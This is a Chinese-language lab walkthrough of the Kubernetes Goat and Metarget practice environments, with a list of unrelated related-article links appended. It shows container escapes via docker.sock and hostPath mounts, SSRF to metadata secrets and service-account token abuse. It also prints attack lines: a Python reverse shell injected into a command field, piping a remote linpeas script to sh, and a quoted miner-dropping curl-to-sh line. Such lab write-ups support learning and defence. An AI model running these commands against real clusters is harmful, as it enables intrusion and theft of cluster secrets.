云原生靶场kebernetesGoat、Metarget

news2024/11/19 23:23:13

靶场

文章目录

  • 靶场
    • kebernetesGoat
      • 靶场安装
      • Docker in Docker
      • SSRF漏洞
      • 容器逃逸到主系统
      • Docker CIS 基线分析
      • Kubernetes CIS 安全基线分析
      • 分析被部署挖矿软件的容器镜像
      • 获取环境信息
      • Hidden in layers
      • RBAC最低权限配置错误
      • 使用 Sysdig Falco 进行运行时安全监控和检测
    • Metarget

kebernetesGoat

Kubernetes Goat 是一款针对 Kubernetes 安全的学习、测试和练习工具,该工具可以给广大研究人员提供一个存在安全缺陷(故意留下漏洞)的集群环境,来帮助广大安全爱好者学习和实践 Kubernetes 安全

项目地址

  • kubernetes-goat
  • K8s集群安全攻防(上)
  • K8s集群安全攻防(下)

靶场安装

  • K8S靶场KubeGoat部署

安装过程中要注意:1.网络要通畅 2.确保磁盘空间充足

  1. 安装 Docker

    1.卸载旧版本Docker
    sudo apt-get remove docker docker-engine docker-ce docker.io
    2.添加阿里云GPG秘钥
    curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
    3.设置存储库
    sudo add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"
    4.安装docker
    sudo apt-get update
    sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin
    5.启动docker
    sudo systemctl start docker
    sudo systemctl enable docker
    
  2. 安装 minikube

    1.安装依赖
     sudo apt-get install -y apt-transport-https
    2.添加阿里GPG
    sudo curl https://mirrors.aliyun.com/kubernetes/apt/doc/apt-key.gpg | sudo apt-key add -
    3.添加阿里apt源
    sudo tee /etc/apt/sources.list.d/kubernetes.list <<-'EOF' 
    deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main 
    EOF
    sudo apt-get update
    4.安装kubelet
    sudo apt-get install -y kubectl
    5.添加用户到docker组
    sudo usermod -aG docker $USER && newgrp docker
    6.安装mibikube
    curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
    sudo install minikube-linux-amd64 /usr/local/bin/minikube
    # 其他系统版本的 https://minikube.sigs.k8s.io/docs/start/
    7.启动mibikube
    minikube start --image-mirror-country=cn --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers --kubernetes-version=1.23.8 --force
    注:结合docker使用时,k8s版本最好不要用1.24及以上版本,k8s从1.24版本开始不在直接兼容docker,需要安装cri-docker。
    
    8.配置alias
    sudo vim .bashrc
    
    alias minikube.cn="minikube start --image-mirror-country=cn --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers --kubernetes-version=1.23.8"
    启动生效
    source .bashrc
    

    验证查看 pod

    kubectl get pods -A
    
  3. 安装 kubegoat

    1.安装helm
    通过官方apt方式进行安装
    curl https://baltocdn.com/helm/signing.asc | gpg --dearmor | sudo tee /usr/share/keyrings/helm.gpg > /dev/null
    sudo apt-get install apt-transport-https --yes
    echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/helm.gpg] https://baltocdn.com/helm/stable/debian/ all main" | sudo tee /etc/apt/sources.list.d/helm-stable-debian.list
    sudo apt-get update
    sudo apt-get install helm
    
    查看helm版本
    helm  version
    
    2.拉取kubegoat仓库
    git clone https://github.com/madhuakula/kubernetes-goat.git
    cd kubernetes-goat
    bash setup-kubernetes-goat.sh 
    
    3.查看容器运行状况
    查看容器是否均运行成功
    kubectl get pod
    
  4. 将资源公开

    bash access-kubernetes-goat.sh
    

访问 1234 端口就可以

Docker in Docker

描述:大多数使用Docker并在管道构建容器的CI/CD和管道系统都使用称为DIND(docker-in-docker)的东西。简单来说就是在Docker容器中调用和执行宿主机的Docker。在此场景中,我们尝试利用并获得对宿主机系统的访问权限。

存在一个命令执行的页面,可以拼接执行任意命令

截屏2024-01-19 10.27.03

如果要利用docker in docker 进行逃逸,前提是在docker容器运行的时候把docker.sock套接字文件一并挂载到了容器中。当我们拿到容器权限又存在挂载的docker.sock套接字文件,我们就可以通过 Docker Socket与宿主机的Docker 服务进行通信,我们可以通过它创建新的容器,并把宿主机的目录挂载到新创建的容器中,这样我们就能访问宿主机的资源了

使用mount命令查看是否挂载了docker.sock套接字文件

截屏2024-01-19 10.29.48

发现确实存在挂载行为,接下来如果这台主机可以访问互联网,可以直接下载docker可执行程序,去执行命令

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
下载文件路径可以替换成我们的vps

解压下载的文件,执行命令

截屏2024-01-19 10.25.21

然后就可以利用docker.sock来访问宿主机系统并在宿主机上执行docker命令

截屏2024-01-19 11.00.36

或者可以直接使用 python 反弹 shell

127.0.0.1;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

另一端使用 nc 监听

ncat -lvvp 4444

截屏2024-01-19 11.05.35

切换交互式终端

python  -c "import pty;pty.spawn('/bin/bash')"

运行linepeas枚举系统

curl -L http://192.168.8.128:8000/linpeas.sh | sh

截屏2024-01-19 11.12.02

找到 docker.sock 文件

截屏2024-01-19 11.16.04

同样使用上传文件的方法可以实现 docker 逃逸

SSRF漏洞

场景描述:SSRF(服务器端请求伪造)漏洞是云原生环境的首选攻击方式。在此场景中,我们将学习如何利用应用程序中存在的SSRF漏洞的来访问云实例元数据以及内部服务元数据信息

截屏2024-01-19 11.24.02

可以看到内部有一个http://metadata-db服务,访问后看到有一个latest的路径,我们继续访问http://metadata-db/latest/

截屏2024-01-19 11.26.21

可以发现好几个路径,通过枚举尝试,最终在http://metadata-db/latest/secrets/kubernetes-goat中发现了关键信息:

截屏2024-01-19 11.27.16

base64 解密

截屏2024-01-19 11.31.22

通过使用 ssrf 绕过 api 接口访问限制,访问敏感接口如:etcd、apiserver

容器逃逸到主系统

场景描述:大多数监控、跟踪和调试软件需要以额外的权限和功能运行。在这个场景中,我们看到一个具有额外功能和权限(甚至包含HostPath)的Pod,它允许我们访问宿主机系统并提供节点级配置,这样会带来可以获取整个集群控制权限的危害。

访问 1233 端口,是一个 web ssh

危险挂载提权

由于用户使用较为危险的挂载将物理机的路径挂载到了容器内,从而导致逃逸

  1. 查看当前权限确定该容器具有主机系统的完整权限

    截屏2024-01-19 11.39.01

    发现当前用户为 root ,运行在 docker 容器中

  2. df -Th 查看挂载信息

    截屏2024-01-19 11.41.13

    mount 查看挂载,发现host-system目录是挂载了宿主机的根目录

    mount | grep host
    
  3. 发现 /host-system 从主机系统安装

    ls -al
    ls /host-system/
    

    截屏2024-01-19 11.42.15

  4. 可以用chroot切换到宿主机的目录,获取对宿主机系统的权限访问

    chroot /host-system bash
    docker ps
    
  5. 目的是控制整个Kubernetes集群,查看Kubernets节点级配置文件

    截屏2024-01-19 11.43.54

  6. 然后我们可以利用配置文件获取集群内的所有资源

    kubectl --kubeconfig /etc/kubernetes/kubelet.conf  get all -n kube-system 
    

    如果没有 kubectl 需要下载并给执行权限

    截屏2024-01-19 16.41.26

Docker CIS 基线分析

场景描述:该场景主要是在 Kubernetes 节点之上进行 Docker CIS 基准分析,以识别可能存在的安全漏洞。

首先需要部署docker bench security将它启动为DaemonSet

 kubectl apply -f scenarios/docker-bench-security/deployment.yaml

截屏2024-01-19 15.12.37

访问docker-bench-security-xxxxx pod 并执行Docker CIS基线测试脚本。

截屏2024-01-19 16.42.46

然后,可以根据 Docker CIS 安全基线测试中看到的漏洞进行进一步的利用或修复

Kubernetes CIS 安全基线分析

场景描述:本场景主要是在Kubernetes节点之上进行Kubernetes CIS基线分析,识别可能存在的安全漏洞。

首先,我们在节点上部署kube-bench securityKubernetes job

kubectl apply -f scenarios/kube-bench-security/node-job.yaml
kubectl apply -f scenarios/kube-bench-security/master-job.yaml

截屏2024-01-19 16.50.09

查看kube-bench-node-xxxxx pod 的日志

然后,可以根据 Kubernetes CIS 安全基线测试中看到的漏洞进行进一步的利用

分析被部署挖矿软件的容器镜像

针对基础设施的挖矿攻击越来越流行。尤其是像 Kubernetes 这样的环境很容易成为目标,因为你甚至看不到容器镜像到底是基于什么构建的,以及它在主动监控方面做了什么。在此场景中,我们将分析和识别被植入挖矿软件的容器镜像。

首先,确定 Kubernetes 集群中的所有资源/镜像和包括作业。

kubectl get pods

标识Kubernetes群集内的所有资源。尽可能详细了解集群内所有节点中可用的每个容器镜像的详细信息

一旦我们确定了在Kubernetes集群中运行的作业,就可以通过运行以下命令来获取Pod信息

kubectl describe job batch-check-job

截屏2024-01-19 16.57.44

获取pods信息:

kubectl get pods --namespace default -l "job-name=batch-check-job"

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

获取pod信息manifest(在Kubernetes中对象使用ManiFest YAML或JSON 来定义,就像 docker-compose.yaml 文档)并分析:

kubectl get pod batch-check-job-xxxx -o yaml

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

可以看到Docker镜像名称是madhuakula/k8s-goat-batch-check

然后通过docker history查看镜像的构建历史记录:

docker history --no-trunc madhuakula/k8s-goat-batch-check

截屏2024-01-19 17.40.35

发现它在其中一层的构建中植入了恶意挖矿脚本

curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup

如果发现使用 docker 命令看不到 k8s 的容器及镜像,如需要minikube link 到现有的docker 配置,需要执行最后一条 eval 命令

[root@localhost docker]# minikube docker-env
export DOCKER_TLS_VERIFY="1"
export DOCKER_HOST="tcp://192.168.99.101:2376"
export DOCKER_CERT_PATH="/root/.minikube/certs"
# Run this command to configure your shell:
# eval $(minikube docker-env)

获取环境信息

场景描述:Kubernetes 中的每个环境都会有很多信息要共享。包括SecretsAPI Keys、配置、服务等等关键内容。所以让我们继续收集关键信息!

收集系统关键信息

id
cat /proc/self/cgroup
cat /etc/hosts
mount
ls -la /home/
printenv  # 获取环境变量,包括 Kubernetes Secret 的 K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c3 和服务名称、端口等

Hidden in layers

场景描述:敏感信息泄露是普遍存在的最常见漏洞之一。在容器化世界中,密码、私钥、令牌等很容易被错误处理。此场景下,我们将分析和识别导致敏感信息泄露等此类处理不当的不良做法之一

执行以下命令,开始本次场景:

kubectl get jobs

截屏2024-01-19 17.22.18

尝试浏览运行容器中的所有文件、环境变量等。接下来,尝试用不同的工具分析上面使用的镜像,以找到暴露的敏感信息

kubectl get pods --all-namespaces -l "job-name=hidden-in-layers"

截屏2024-01-19 17.27.27

尝试浏览运行容器中的所有文件、环境变量等。接下来,尝试用不同的工具分析上面使用的镜像,以找到暴露的敏感信息

获取详细信息:

kubectl get pod hidden-in-layers-cts6h -o yaml

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

使用docker cli分析镜像信息

docker inspect madhuakula/k8s-goat-hidden-in-layers

截屏2024-01-19 17.44.04

可以看到镜像设置了容器启动时要执行的一些命令。但获取的信息还太少,继续探索。

如果我们了解这个镜像是如何从头开始构建的,也许对我们会更有帮助。如果你有 dockerfile,可以直接分析镜像的 dockerfile。如果没有,可以通过其他几种方法分析

方法一:查看构建历史

docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers

截屏2024-01-19 17.55.01

可以看到一个 secret.txt 文件比较敏感

方法二,通过镜像反向生成dockerfile

可以通过alpine/dfimage 工具生成指定镜像的dockerfile

alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers

截屏2024-01-22 16.20.50

截屏2024-01-22 16.21.36

方法三,使用Dive工具

Dive 是一个非常棒的工具,可以帮助分析镜像的每一层。https://github.com/wagoodman/dive,dive:一款按层分析docker镜像的工具

Kali 安装

wget https://github.com/wagoodman/dive/releases/download/v0.4.1/dive_0.4.1_linux_amd64.deb
sudo apt install ./dive_0.4.1_linux_amd64.deb

使用方法如下

dive madhuakula/k8s-goat-hidden-in-layers

截屏2024-01-22 16.33.08

可以发现 secret.txt 和 contribution.txt 两个文件比较可疑,镜像启动时会删除 secret 文件,先运行容器查看 contribution.txt 文件

kubectl run hell --rm --restart=Never -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh

截屏2024-01-22 16.39.59

没有什么东西,现在要去恢复 secret.txt 文件,首先使用docker save把镜像导出为文件

docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers.tar

解压出来:

tar -xvf hidden-in-layers.tar

可以看到每个层都被导出为一个单独的tar文件。这个镜像有3层,所以有3个tar文件。这里因为只有3层,所以很容易提取所有的层并检查内容,但如果镜像有上百层,这个方法就不太好用了

通过 dive 可以看到 secret 层 id 为 2a679 开头,添加了secret.txt文件,所以我们解压这一层的tar进行文件分析

截屏2024-01-22 16.45.33

截屏2024-01-22 16.48.50

RBAC最低权限配置错误

场景描述:在现实世界中,们经常看到开发人员和 devops 团队往往会提供超出需求的额外权限。这种情况发生时,攻击者获得了比他们预期的更多的控制权和特权。在此场景中,你可以利用绑定到 podserviceaccount 提供的 webhookapikey 访问权限。但这也会让攻击者可以控制和获取敏感资源。获得对 vaultapikey 的访问权限

截屏2024-01-23 10.19.07

此部署具有映射了过度许可策略/访问权限的自定义服务帐户。作为攻击者,我们可以利用这一点来访问其他资源和服务

由于Kubernetes默认情况下将所有secretstokensservice accounts 信息都存储在一个固定的目录包含访问集群资源的凭证,直接访问这个目录查找敏感信息

在Kubernetes中,Secrets、Tokens和Service Accounts是敏感信息,其权限需要根据实际使用场景进行细粒度的控制。以下是一些通用的最小权限原则:

  1. Secrets权限:
    • kubectl权限: 通常,只有具有kubectl命令行工具权限的用户或服务账户才能访问Secrets。
    • Pod权限: 只有运行在同一Namespace中的Pod才能访问该Namespace下的Secrets。在Pod的spec中使用serviceAccountName字段指定使用的Service Account。
  2. Service Accounts权限:
    • Role-Based Access Control (RBAC): 使用RBAC规则授予Service Accounts最小必需的权限。为Service Account分配适当的ClusterRole或Role,确保其仅能够执行其任务所需的操作。
    • Namespace限制: Service Account的权限通常是限定在特定Namespace内的。确保Service Account仅能够访问其所在Namespace的资源。
  3. Token权限:
    • Bearer Token认证: Kubernetes API Server使用Bearer Token进行认证。确保Bearer Token只分发给具有最小权限的实体,以避免滥用。
    • RBAC: Bearer Token的权限受到RBAC规则的限制,确保Token只能执行授予的操作。
  4. Pod权限:
    • Service Account授权: Pod通过挂载Service Account Token的方式来使用Service Account的身份进行API访问。Pod的Service Account需要拥有足够的RBAC权限。
cd /var/run/secrets/kubernetes.io/serviceaccount/
ls -la

截屏2024-01-23 10.22.22

现在可以使用这些信息与 Kubernetes API 服务进行交互,该服务具有对令牌的可用权限和特权

依次设置环境变量分别指向内部 API 服务器主机名:

export APISERVER=https://${KUBERNETES_SERVICE_HOST}

设置 ServiceAccount 令牌的路径

export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount

读取 pods namespace 并将其设置为变量。namespace应该是 big-monolith,如果它是default,你需要将 Kubernetes-goat 更新到最新版本(https://github.com/madhuakula/kubernetes-goat/commit/d068966ae481df55caed818c7cfc14867c1e42a1)

export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)

指定读取ServiceAccount持有者令牌

export TOKEN=$(cat ${SERVICEACCOUNT}/token)

指定在cURL请求查询时要使用的证书路径

export CACERT=${SERVICEACCOUNT}/ca.crt

然后就可以使用令牌和构造的查询来访问 Kubernetes API

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

因为 Kubernetes 本身是利用 API 服务来创建、删除 pod 等操作的,所以你可以尝试并利用所有可能的 Kubernetes 操作

查询default命名空间中的secrets

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

截屏2024-01-23 11.07.58

查询特定命名空间中的pod

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods

截屏2024-01-23 11.10.14

获取 k8svaultapikey

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey

截屏2024-01-23 11.11.48

使用 Sysdig Falco 进行运行时安全监控和检测

场景描述:这个场景是为容器和Kubernetes资源部署运行时安全监控和检测

要开始使用此方案,你需要使用helm v3进行部署

https://falco.org/zh-cn/docs/

# helm3 install(可选项)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

# 创建namespace
kubectl create ns falco

# 下载好离线 helm chart包
wget https://github.com/falcosecurity/charts/releases/download/falco-3.8.7/falco-3.8.7.tgz

# 一键式helm命令安装Falco
# 正式安装需要去掉  --dry-run --debug
helm -n falco install falco ./falco-3.8.7.tgz --set falco.jsonOutput=true --set falco.json_output=true --set falco.http_output.enabled=true --set falco.http_output.url=http://falco-falcosidekick:2801/ --set falcosidekick.enabled=true --set falcoctl.artifact.install.enabled=false --set falcoctl.artifact.follow.enabled=false --dry-run --debug

# 卸载
helm -n falco uninstall falco
  • kubernetes-goat(K8S靶场)
  • 通过Kuberneters Goat学习K8S安全(上)
  • 通过Kuberneters Goat学习K8S安全(下)

Metarget

项目文档:https://github.com/Metarget/metarget/blob/master/README-zh.md

Metarget 的初衷之一是方便安全研究人员在漏洞出现的第一时间快速搭建漏洞环境,实现“云原生组件”和“云原生应用”的脆弱场景

使用 Metarget 搭建 zabbix cve-2020-11800 漏洞环境

# 1.先安装 docker 或 k8s,domestic 使用国内镜像
./metarget gadget install docker --version 18.03.1
./metarget gadget install k8s --version 1.16.5 --domestic 
# 2.安装漏洞环境,verbose 方便调试, --external 对外开放
./metarget appv install cve-2020-11800 --verbose --external
# 3.删除环境
./metarget appv remove cve-2020-11800

启动之后使用 kubectl 确定端口

kubectl get service --all-namespaces 

image-20240321180034693

查看服务运行状态

kubectl get pods --all-namespaces

image-20240322144907361

有些环境可能会启动失败,失败删除也可能失败,使用 kubectl 命令删除 k8s 服务

# 1.如果无法删除,使用 kubect 命令删除 deployment 控制器
kubectl -n <namespace-name> delete deployments --all
如果您有一个 Deployment 控制器管理着一些 Pod,当您手动删除一个 Pod 时,Deployment 控制器会检测到 Pod 数量不匹配,并尝试重新创建一个新的 Pod 来替换被删除的 Pod,以此来维持期望的状态
# 2.删除命名空间中的所有 Pod:
kubectl -n <namespace-name> delete pods --all
# 3.删除命名空间中的所有 Service:
kubectl -n <namespace-name> delete services --all

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1547617.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

UE5、CesiumForUnreal实现海量POI撒点显示与聚合功能

1.实现目标 POI是UE+GIS三维场景中经常需要展示的要素,在UE中常用的表示POI方法有两种。一种是Mesh,即空间的方式;另一种是Widget,即屏幕上的方式,本文这里使用的是Widget屏幕展示的形式来表示POI。 本文这里使用的POI点位数量共3.3w+,采用直接网格聚合算法,并进行性能优…

ROS机器人入门第四课:话题通信

文章目录 ROS机器人入门第四课&#xff1a;话题通信一、话题通信概述&#xff08;一&#xff09;概念&#xff08;二&#xff09;作用 二、话题通信基本操作需求:分析:流程:&#xff08;一&#xff09;发布方解释一些关键的ROS函数和概念&#xff1a; &#xff08;二&#xff0…

2024年福建事业单位招聘详细流程

2024年福建事业单位招聘详细流程&#xff0c;速速查收&#xff01;

湖北汽车工业学院 实验一 关系数据库标准语言SQL

头歌 实验一 关系数据库标准语言SQL 制作不易&#xff01;点个关注呗&#xff01;为大家创造更多的价值&#xff01; 目录 头歌 实验一 关系数据库标准语言SQL**制作不易&#xff01;点个关注呗&#xff01;为大家创造更多的价值&#xff01;** 第一关&#xff1a;创建数据库第…

简单服务器通信、IO多路复用(select、poll、epoll)以及reactor模式。

网络编程学习 简单服务器通信TCP三次握手和四次挥手三次握手&#xff08;如下图&#xff09;常见问题&#xff1f; 四次挥手 client和server通信写法server端client端 通信双方建立连接到断开连接的状态转换怎么应对多用户连接&#xff1f;缺点 IO多路复用select优缺点 pollpol…

算法---动态规划练习-5(下降路径最小和)

下降路径最小和 1. 题目解析2. 讲解算法原理方法一方法二 3. 编写代码法一法二 1. 题目解析 题目地址&#xff1a;点这里 2. 讲解算法原理 方法一 首先&#xff0c;通过matrix的大小确定矩阵的行数m和列数n。 创建一个大小为(m1) (n2)的二维动态规划数组dp&#xff0c;其中d…

OC 技术 苹果内购

一直觉得自己写的不是技术&#xff0c;而是情怀&#xff0c;一个个的教程是自己这一路走来的痕迹。靠专业技能的成功是最具可复制性的&#xff0c;希望我的这条路能让你们少走弯路&#xff0c;希望我能帮你们抹去知识的蒙尘&#xff0c;希望我能帮你们理清知识的脉络&#xff0…

2022 年甘肃省职业院校技能大赛 高职组 网络系统管理竞赛 网络构建模块试题

2022 年甘肃省职业院校技能大赛 高职组网络系统管理竞赛 网络构建模块试题 目 录 考试说明… 3 任务描述… 3 任务清单… 3 &#xff08;一&#xff09;基础配置… 3 &#xff08;二&#xff09;有线网络配置… 4 &#xff08;三&#xff09;无线网络配置… 6 &#xff08;四&a…

惊艳亮相!新版飞桨星河社区邀您共赴星辰大海

亲爱的开发者们&#xff1a; 一场始于好奇、归于热爱的邂逅&#xff0c;让开发者们在飞桨星河社区相聚&#xff0c;相逢于活动、课程、比赛、项目……五年来&#xff0c;千万开发者的共同参与&#xff0c;让这个社区更富活力、更加温暖。 2018年&#xff0c;AI Studio 1.0版本上…

RHCE- 4-Web服务器(2)

基于https协议的静态网站 概念解释 超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息。 HTTP协议以明文方式发送内容&#xff0c;不提供任何方式的数据加密&#xff0c;如果攻击者截取了Web浏览器和网站服务器之间的传输报文&#xff0c;就可以直接读懂其中…

LVS负载均衡(load balance)

一 LVS LVS&#xff1a;Linux Virtaul Server&#xff0c;该软件的功能是实现 LB&#xff08;load balance&#xff09; 二LVS 的三种工作模式 1.NAT 模式&#xff08;NAT&#xff09; LVS 服务器同时充当一台 NAT 网关&#xff0c;拥有公有 IP &#xff0c;同时负责将针对此…

Apple Vision Pro应用合集

这里给大家分享一个网站&#xff0c;手机了最新的apple vision pro 上面运行的应用。 1、查找应用&#xff1a;用户可以浏览特色推荐的应用&#xff0c;或者通过随机挑选功能发现新的应用。 2、社区交流&#xff1a;提供社区功能&#xff0c;用户可以在这里交流使用体验、分享…

Chrome/Edge 使用 Markdown Viewer 查看 Markdown 格式文件

Chrome/Edge 使用 Markdown Viewer 查看 Markdown 格式文件 0. 引言1. 安装 Markdown Viewer 插件2. 使用 Markdown Viewer 阅读 Markdown 格式文件 0. 引言 大部分程序员都喜欢 Markdown 格式的文件&#xff0c;这时给一些没有在电脑上安装 Markdown 编辑器的同事分享资料时&…

SAP gui 组服务器 提示 Error service sapmsPRD unknown

/etc/hosts 追加IP地址和域名的配对关系 /etc/services 追加 sapms[sid] 3601/tcp

java数据结构与算法刷题-----LeetCode665. 非递减数列

java数据结构与算法刷题目录&#xff08;剑指Offer、LeetCode、ACM&#xff09;-----主目录-----持续更新(进不去说明我没写完)&#xff1a;https://blog.csdn.net/grd_java/article/details/123063846 文章目录 解题思路&#xff1a;时间复杂度O( n n n)&#xff0c;空间复杂度…

在vscode终端terminal加大栈空间How to increase max stack size in c++ using vscode

参考:https://devpress.csdn.net/cloud/63268204fd0b112779162383.html Answer a question In many dynamic programming and graph problems it is required to do long depth recursion. I am currently using vscode and mingw in windows for my c programs. But in defau…

计算机视觉之三维重建(4)---三维重建基础与极几何

文章目录 一、三维重建基础1.1 问题引入1.2 线性解法1.3 非线性解法1.4 多视图几何的关键问题 二、极几何与基础矩阵2.1 极几何2.2 极几何特例2.3 本质矩阵2.4 本质矩阵的性质2.5 基础矩阵2.6 基础矩阵的性质 三、基础矩阵估计 一、三维重建基础 1.1 问题引入 1. 从单张图像恢…

MySQL Explain 字段详解

Explain 工具介绍 Explain 一般被称为解释器&#xff0c;通过 Explain 工具&#xff0c;我们能分析我们使用的查询语句或是结构的性能瓶颈&#xff0c;它提供 MySQL 如何执行语句的信息。 使用语法&#xff1a; explain [extended|partition] select在 select 关键字前加 ex…

【多模态融合】SuperFusion 激光雷达与相机多层次融合 远距离高清地图预测 ICRA 2024

前言 本文介绍激光雷达与相机进行多层次融合&#xff0c;包括数据级融合、特征级融合和BEV级融合。 融合后的BEV特征可以支持不同的任务头&#xff0c;包括语义分割、实例编码和方向预测&#xff0c;最后进行后处理生成高清地图预测&#xff0c;它是来自ICRA 2024的。 会讲解…

【C++ leetcode】双指针(专题完结)

15. 三数之和 题目 给你一个整数数组 nums &#xff0c;判断是否存在三元组 [nums[i], nums[j], nums[k]] 满足 i ! j、i ! k 且 j ! k &#xff0c;同时还满足 nums[i] nums[j] nums[k] 0 。请 你返回所有和为 0 且不重复的三元组。 注意&#xff1a;答案中不可以包含重复的…